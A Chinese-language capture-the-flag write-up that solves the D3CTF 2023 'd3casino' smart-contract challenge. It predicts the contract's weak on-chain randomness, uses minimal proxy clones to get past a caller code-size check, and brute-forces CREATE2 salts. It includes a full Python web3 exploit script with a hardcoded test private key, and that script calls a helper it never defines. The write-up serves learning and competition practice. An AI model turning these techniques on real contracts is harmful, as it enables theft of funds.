2023 D3CTF d3casino writeup

2023-04-30

字数统计: 3.4k字 | 阅读时长≈ 18分

一道不错的区块链题目，主要是 Minimal Proxy 合约的学习。

题目源码信息

// contracts/D3Casino.sol
pragma solidity 0.8.17;

contract D3Casino{
    uint256 constant mod = 17;
    uint256 constant SAFE_GAS = 10000;
    uint256 public lasttime;
    mapping(address => uint256) public scores;
    mapping(address => bool) public betrecord;
    event SendFlag();

    constructor() {
        lasttime = block.timestamp;
    }

    function bet() public {
        require(lasttime != block.timestamp, "You can only bet once per block");
        require(
            betrecord[msg.sender] == false,
            "You can only bet once per contract"
        );

        assembly {
            let size := extcodesize(caller())
            if gt(size, 0x64) {
                invalid()
            }
        }

        lasttime = block.timestamp;
        betrecord[msg.sender] = true;
        uint256 rand = uint256(
            keccak256(
                abi.encodePacked(block.timestamp, block.difficulty, msg.sender)
            )
        ) % mod;

        uint256 value;
        bool success;
        bytes memory result;
        (success, result) = msg.sender.staticcall{gas: SAFE_GAS}("");
        require(success, "Call failed!");
        value = abi.decode(result, (uint256));

        if (rand == value) {
            uint256 score;
            for (uint i = 0; i < 20; i++) {
                if (bytes20(msg.sender)[i] == 0 && bytes20(tx.origin)[i] == 0) {
                    score++;
                }
            }
            scores[tx.origin] += score;
        } else {
            scores[tx.origin] = 0;
        }
    }

    function Solve() public {
        require(
            scores[msg.sender] >= 10,
            "You Don't Have Enough Score To Solve The Challenge"
        );
        emit SendFlag();
    }
}

合约逻辑分析

合约整体逻辑比较清楚，我与目标合约的 bet 函数进行交互，需要完成 Solve 的条件，首先看一下逻辑限制（按照合约顺序）：

line 17 : 限制单个块内只能交易一次，也就是单个区块内只能与目标合约的 bet 函数交易一次。
line 18-21 : 每个合约只能成功调用 bet 函数一次。
line 23-28：调用 bet 的合约 runtime code 长度不超过 0x64 字节。
line 41：使用 staticcall 回调 msg.sender 的 fallback 函数，限制了 gas 费不超过 1000。

总结一句话就是必须使用字节码不超过 0x64 的小合约与 casino 合约交互，并且杜绝了重入的可能。

再看获得 score 的条件，首先需要猜测一个由区块信息和 msg.sender 完全确定的随机数 rand，猜测的结果通过我们合约的 fallback 函数返回给 casino，猜对了才能继续下面判定，否则 socre 清 0。随机数猜对后，如果msg.sender （我们部署的合约地址）与 tx.origin（我们的账户地址）在相同的位置都有 00 字节，则积一分，可多次积分，连续10 次满足以上条件就可以成功调用 Solve 获取 flag，因此我们同一个账户创建最多十个合约成功 bet 即可。

Nice Address

获取 score 的条件要求我们账户的地址含有比较多的 00 ，以及我们用于交互的合约（记为 solver合约）地址也有 00。账户地址可以使用 python web3 穷举，或者直接 vanity 生成前缀 00 地址即可。

# find good address (with many 00 in its public address) in web3 eth
from web3 import Web3
from tqdm import tqdm
# connect to Ethereum node, not necessary
web3 = Web3(Web3.HTTPProvider('https://mainnet.infura.io/v3/your-project-id'))

def count_00(addr):
    if addr[:2] == '0x':
        addr = addr[2:]
    cnt = 0
    for i in range(0,len(addr),2):
        if addr[i:i+2] == '00':
            cnt += 1
    return cnt

# loop through all addresses
for i in tqdm(range(1000000)):
    account = web3.eth.account.create()
    if count_00(account.address) >= 3:
        print(f"zero count: {account.address.count('00')}")
        print(f"Private key: {account.privateKey.hex()}")
        print(f"Public key: {account.address}")

print('Done')

如果我们想要部署的合约地址和账户的地址在相同的位置有 00 字节，就必须通过一个代理合约使用 create/create2 来创建实际交互合约 solver，使用 create2 ，调整 salt 值即可完全预测合约部署的地址，因此可以链下穷举 salt ，找到符合条件的 salt 值，再使用 create2 创建合约上链。

solver 合约

最终 solver 合约如下，这个合约编译出来的字节码肯定大于 0x64 ，即使开了 999 优化编译也有 1000 字节左右，不能直接与 casino 合约交互，绕过部分参考下一节。

pragma solidity 0.8.17;

contract solver{
    uint256 ans;
    D3Casino d3;

    function solve(address _target) public {
        d3 = D3Casino(_target);
        ans = uint256(keccak256(abi.encodePacked(block.timestamp, block.difficulty, address(this)))) % 17;
        d3.bet();
    }

    // _data : calldata 
    fallback(bytes calldata /*_data)*/) external returns (bytes memory) {
        return abi.encode(ans);
    }
}

我们需要定义一个带参数和返回值、non-payable、不能改变链上状态的 fallback 函数，并且不能有复杂的计算，因此 ans 的计算必须放在 fallback 之外，放在交互的合约 solve 内计算是最好的。

Minimal Proxy 合约

这题的最难点就是如何绕过字节码长度的限制。一个比较简单的想法就是通过在 constructor 内部完成所有交互过程，即将上节的 solver 内的 solve 函数改成 constructor 即可，因为在 constructor 内部调用目标合约，我们的 solver 还没完成初始化，只有 init/deploy 字节码，其 runtime 字节码长度是 0 ，即可绕过 runtime 字节码长度限制。

但是很可惜，上述方法不行。原因在于 casino 合约的 bet 函数会回调 solver 合约的 fallback 函数，而如果我们在 constructor 内交互，实际 solver 的 fallback 函数还没初始化，casino 内的 staticcall 虽然可以调用成功，但是返回值为空，后续 decode 会发生 revert。

最终的解法是 ERC-1167: Minimal Proxy Contract ，详细的构造可以参考 OpenZippelin 的博客和实现。其核心原理就是我们先部署一个 solver 合约上链，作为我们的 implementation 合约，后续我们通过 Mini Proxy 合约不断克隆 solver 得到新合约，新合约实际逻辑通过 DELEGATECALL 与 solver 保持完全一样，而新合约本身只需要实现简单的 call data 转发和结果回传功能即可，实现逻辑如下：

Receive some data
Forward the received data to an implementation contract using the DELEGATECALL instruction.
Get the result of the external call (i.e., the result of DELEGATECALL)
Return the external call’s result to the caller if step 3 succeeded, or revert the transaction in any other case.

Minimal Proxy Contract 生成的合约是用汇编写的，典型的 runtime code 如下，仅 55 个字节，满足题目条件：

1	3d602d80600a3d3981f3363d3d373d3d3d363d73bebebebebebebebebebebebebebebebebebebebe5af43d82803e903d91602b57fd5bf3

但是实际上用 OpenZippelin 的 Clone 合约部署的克隆合约字节码如下，仅 45 个字节：

1	363d3d373d3d3d363d731ffbd6041951b0641bc171adefb8c87bf596172b5af43d82803e903d91602b57fd5bf3

All in One

最后把上面的所有的部分串起来（使用 python web3 完成链下部分）：

生成含有比较多 00 字节的账户地址
部署 solver 合约， clone 合约
穷举 salt 值，直到预测的合约地址与账户地址有相同位置的 00 字节
使用 salt ，调用 clone 合约使用 create2 克隆 solver 合约得到 cloned solver 合约
通过 cloned solver 合约与 casino 合约交互，重复 Step 3 - 5，直到 score 大于 10 分。

脚本

python exp/local solver (读者可以使用 ganache + remixd在本地验证)

# ganache-cli --account "0x7207dccc6b59a6945ca0c8431bec866265a37217f3fde378cd0d33bc5f64a428,300000000000000000000"

from eth_utils import keccak
from web3 import Web3, HTTPProvider
import os
from solcx import install_solc, compile_files
from random import randint

# copile solidity with given version
def compile_sol(version="0.8.17", path="exp_sol.sol"):
    install_solc(version)
    source_dict = {path: open(path, "r").read()}
    contract_interface = compile_files(
        # source_dict, output_values=["abi", "bin"], solc_version=version, optimize=True)
        source_dict, output_values=["abi", "bin"], solc_version=version)
    return contract_interface


def find_good_addr(sender_addr, init_code):
    salt = randint(0, 2**32)
    score = 0
    salts = []
    while True:
        addr = create2_address(sender_addr, salt, init_code)
        addrbytes = bytes.fromhex(addr[2:])
        for p in pos:
            if addrbytes[p] == 0:
                score += 1
                salts.append(salt)
                print(f"score: {score}, salt: {salt}, addr: {addr}")
        if score >= 10:
            return list(set(salts))
        salt += 1

# set up test wallet


def set_up_wallet(w3, private_key):
    # set up wallet
    wallet = w3.eth.account.privateKeyToAccount(private_key)
    w3.eth.defaultAccount = wallet.address
    return wallet

def deploy_contract(w3, bytecodes, mabi, account, value=0,  gas_limit=10000000):
    # Create a nonce for the transaction
    nonce = w3.eth.getTransactionCount(account.address)
    # Get the contract bytecode
    bytecode = bytecodes
    # Create a transaction dictionary
    transaction = {
        "nonce": nonce,
        "gas": gas_limit,
        # 'maxFeePerGas': 50000000000,
        # 'maxPriorityFeePerGas': 10000000000,
        'gasPrice': 10000000000,
        "from": w3.toChecksumAddress(account.address),
        "data": bytecode,
        "chainId": w3.eth.chain_id,
        "value": value,
    }
    # Sign the transaction with the account's private key
    signed = account.signTransaction(transaction)
    # Send the raw transaction to the network
    tx_hash = w3.eth.sendRawTransaction(signed.rawTransaction)
    # Wait for the transaction to be mined
    tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
    # Get the contract address from the transaction receipt
    # print(tx_receipt)
    assert tx_receipt.status == 1, "deploy failed"
    contract_address = tx_receipt.contractAddress
    # Create a Contract object for the deployed contract
    contract = w3.eth.contract(
        address=contract_address,
        abi=mabi
    )
    return contract

private_key = "0x7207dccc6b59a6945ca0c8431bec866265a37217f3fde378cd0d33bc5f64a428"
addr = "0x14205c5A1d00c127B40A6E2B55E6001C000c51A6"
# zero positions
pos = [5, 14, 16]
addr_bytes = bytes.fromhex(addr[2:])

local = True
if local:
    w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:8545"))
else:
    w3 = Web3(Web3.HTTPProvider("http://106.14.124.130:32484"))
assert w3.isConnected(), "not connected"
wallet = set_up_wallet(w3, private_key)
assert wallet.address == addr, "wallet address is not correct"

all_contract_interface = compile_sol(version="0.8.17", path="exp_sol.sol")
clone_interface = all_contract_interface["exp_sol.sol:Clones"]
solver_interface = all_contract_interface["exp_sol.sol:solver"]
D3Casino_interface = all_contract_interface["exp_sol.sol:D3Casino"]

print(f"[+] wallet balance {w3.eth.getBalance(wallet.address)}")

if local:
    clone = deploy_contract(
        w3, clone_interface["bin"], clone_interface["abi"], wallet)
    target = deploy_contract(
        w3, D3Casino_interface["bin"], D3Casino_interface["abi"], wallet)
    solver = deploy_contract_with_paras(
        w3, solver_interface, wallet, [target.address])
else:
    clone = w3.eth.contract(
        "0x82b8531028e41ba3219435E15B2C9DaB3aAC7Fb1", abi=clone_interface["abi"])
    target = w3.eth.contract(
        "0xCF71eE7b096CeCB4A68139E5259f3887dB29d201", abi=D3Casino_interface["abi"])
    solver = w3.eth.contract(
        "0x4099a8D54412c614f8D4B9DF423FAaccD17690a1", abi=solver_interface["abi"])

solver_bt = w3.eth.getCode(solver.address)
print(f"[+] The solver implementation contract's bytecodes length: {len(solver_bt)}")
# print(f"[+] { solver_bt.hex() = }")

while True:
    good_salt = False
    salt = os.urandom(32)
    proxy_solver_addr = clone.functions.predictDeterministicAddress(
        solver.address, '0x' + salt.hex()).call()
    proxy_solver_addr_bytes = bytes.fromhex(proxy_solver_addr[2:])
    for p in pos:
        if proxy_solver_addr_bytes[p] == 0:
            good_salt = True
            break
    score = target.caller.scores(addr)
    if score >= 10:
        break
    if good_salt:
        print(f"[+] { salt.hex() = }")
        print(f"[+] { proxy_solver_addr = }")
        tx = clone.functions.cloneDeterministic(solver.address, '0x' + salt.hex()).build_transaction({
            'chainId': w3.eth.chain_id,
            'gas': 5000000,
            # 'maxFeePerGas': 50000000000,
            # 'maxPriorityFeePerGas': 10000000000,
            'gasPrice': 10000000000,
            'nonce': w3.eth.get_transaction_count(wallet.address),
            'from': w3.toChecksumAddress(wallet.address),
        })

        signed_tx = w3.eth.account.sign_transaction(tx, private_key)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
        tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
        # print(f"[+] { tx_receipt = }")
        proxy_solver_bt = w3.eth.getCode(proxy_solver_addr)
        print(f"[+] The solver proxy_solver contract's bytecodes : {len(proxy_solver_bt)}")
        print(f"[+] { proxy_solver_bt.hex() = }")

        # assert proxy_addr == proxy_solver_addr, f"bad address failed {proxy_addr}"
        assert tx_receipt.status == 1, "clone deploy failed"

        proxy = w3.eth.contract(proxy_solver_addr, abi=solver_interface["abi"])
        tx = proxy.functions.solve(target.address).build_transaction({
            'chainId': w3.eth.chain_id,
            "gas": 5000000,
            # 'maxFeePerGas': 50000000000,
            # 'maxPriorityFeePerGas': 10000000000,
            'gasPrice': 10000000000,
            'nonce': w3.eth.get_transaction_count(wallet.address),
            'from': w3.toChecksumAddress(wallet.address),
        })
        signed_tx = w3.eth.account.sign_transaction(tx, private_key)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
        tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
        # print(f"[+] { tx_receipt = }")

        assert tx_receipt.status == 1, "solve failed"
        score = target.caller.scores(addr)
        print(f"[+] { score = }")

tx = target.functions.Solve().build_transaction({
    'chainId': w3.eth.chain_id,
    "gas": 5000000,
    # 'maxFeePerGas': 50000000000,
    # 'maxPriorityFeePerGas': 10000000000,
    'gasPrice': 10000000000,
    'nonce': w3.eth.get_transaction_count(wallet.address),
    'from': w3.toChecksumAddress(wallet.address),
})
signed_tx = w3.eth.account.sign_transaction(tx, private_key)
tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)
print(f"[+] { tx_receipt = }")

# 0x363d3d373d3d3d363d735953a351516a1e3ddcf3a2764a40f841972dde8c5af43d82803e903d91602b57fd5bf3
# 0x3d602d80600a3d3981f3363d3d373d3d3d363d73bebebebebebebebebebebebebebebebebebebebe5af43d82803e903d91602b57fd5bf3

exp_sol.sol

// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;
// import "d3solver.sol";

// interface D3Casino {
//     event SendFlag();
//     function bet() external;
//     function Solve() external;
// }

pragma solidity 0.8.17;

contract D3Casino{
    uint256 constant mod = 17;
    uint256 constant SAFE_GAS = 10000;
    uint256 public lasttime;
    mapping(address => uint256) public scores;
    mapping(address => bool) public betrecord;
    event SendFlag();

    constructor() {
        lasttime = block.timestamp;
    }

    function bet() public {
        require(lasttime != block.timestamp, "You can only bet once per block");
        require(
            betrecord[msg.sender] == false,
            "You can only bet once per contract"
        );

        assembly {
            let size := extcodesize(caller())
            if gt(size, 0x64) {
                invalid()
            }
        }

        lasttime = block.timestamp;
        betrecord[msg.sender] = true;
        uint256 rand = uint256(
            keccak256(
                abi.encodePacked(block.timestamp, block.difficulty, msg.sender)
            )
        ) % mod;

        uint256 value;
        bool success;
        bytes memory result;
        (success, result) = msg.sender.staticcall{gas: SAFE_GAS}("");
        require(success, "Call failed!");
        value = abi.decode(result, (uint256));

        if (rand == value) {
            uint256 score;
            for (uint i = 0; i < 20; i++) {
                if (bytes20(msg.sender)[i] == 0 && bytes20(tx.origin)[i] == 0) {
                    score++;
                }
            }
            scores[tx.origin] += score;
        } else {
            scores[tx.origin] = 0;
        }
    }

    function Solve() public {
        require(
            scores[msg.sender] >= 10,
            "You Don't Have Enough Score To Solve The Challenge"
        );
        emit SendFlag();
    }

    function _solve() public view returns (bool) {
        return scores[msg.sender] >= 10;
    }
}

pragma solidity ^0.8.0;

/**
 * @dev https://eips.ethereum.org/EIPS/eip-1167[EIP 1167] is a standard for
 * deploying minimal proxy contracts, also known as "clones".
 *
 * > To simply and cheaply clone contract functionality in an immutable way, this standard specifies
 * > a minimal bytecode implementation that delegates all calls to a known, fixed address.
 *
 * The library includes functions to deploy a proxy using either `create` (traditional deployment) or `create2`
 * (salted deterministic deployment). It also includes functions to predict the addresses of clones deployed using the
 * deterministic method.
 *
 * _Available since v3.4._
 */
contract Clones {
    /**
     * @dev Deploys and returns the address of a clone that mimics the behaviour of `implementation`.
     *
     * This function uses the create opcode, which should never revert.
     */
    function clone(address implementation) public returns (address instance) {
        /// @solidity memory-safe-assembly
        assembly {
            // Cleans the upper 96 bits of the `implementation` word, then packs the first 3 bytes
            // of the `implementation` address with the bytecode before the address.
            mstore(0x00, or(shr(0xe8, shl(0x60, implementation)), 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000))
            // Packs the remaining 17 bytes of `implementation` with the bytecode after the address.
            mstore(0x20, or(shl(0x78, implementation), 0x5af43d82803e903d91602b57fd5bf3))
            instance := create(0, 0x09, 0x37)
        }
        require(instance != address(0), "ERC1167: create failed");
    }

    /**
     * @dev Deploys and returns the address of a clone that mimics the behaviour of `implementation`.
     *
     * This function uses the create2 opcode and a `salt` to deterministically deploy
     * the clone. Using the same `implementation` and `salt` multiple time will revert, since
     * the clones cannot be deployed twice at the same address.
     */
    function cloneDeterministic(address implementation, bytes32 salt) public returns (address instance) {
        /// @solidity memory-safe-assembly
        assembly {
            // Cleans the upper 96 bits of the `implementation` word, then packs the first 3 bytes
            // of the `implementation` address with the bytecode before the address.
            mstore(0x00, or(shr(0xe8, shl(0x60, implementation)), 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000))
            // Packs the remaining 17 bytes of `implementation` with the bytecode after the address.
            mstore(0x20, or(shl(0x78, implementation), 0x5af43d82803e903d91602b57fd5bf3))
            instance := create2(0, 0x09, 0x37, salt)
        }
        require(instance != address(0), "ERC1167: create2 failed");
    }

    /**
     * @dev Computes the address of a clone deployed using {Clones-cloneDeterministic}.
     */
    function predictDeterministicAddress(
        address implementation,
        bytes32 salt,
        address deployer
    ) public pure returns (address predicted) {
        /// @solidity memory-safe-assembly
        assembly {
            let ptr := mload(0x40)
            mstore(add(ptr, 0x38), deployer)
            mstore(add(ptr, 0x24), 0x5af43d82803e903d91602b57fd5bf3ff)
            mstore(add(ptr, 0x14), implementation)
            mstore(ptr, 0x3d602d80600a3d3981f3363d3d373d3d3d363d73)
            mstore(add(ptr, 0x58), salt)
            mstore(add(ptr, 0x78), keccak256(add(ptr, 0x0c), 0x37))
            predicted := keccak256(add(ptr, 0x43), 0x55)
        }
    }

    /**
     * @dev Computes the address of a clone deployed using {Clones-cloneDeterministic}.
     */
    function predictDeterministicAddress(address implementation, bytes32 salt)
        public
        view
        returns (address predicted)
    {
        return predictDeterministicAddress(implementation, salt, address(this));
    }
}



pragma solidity 0.8.17;

contract solver{
    uint256 ans;
    D3Casino d3;

    function solve(address _target) public {
        d3 = D3Casino(_target);
        ans = uint256(keccak256(abi.encodePacked(block.timestamp, block.difficulty, address(this)))) % 17;
        d3.bet();
    }

    // _data : calldata 
    fallback(bytes calldata /*_data)*/) external returns (bytes memory) {
        return abi.encode(ans);
    }
}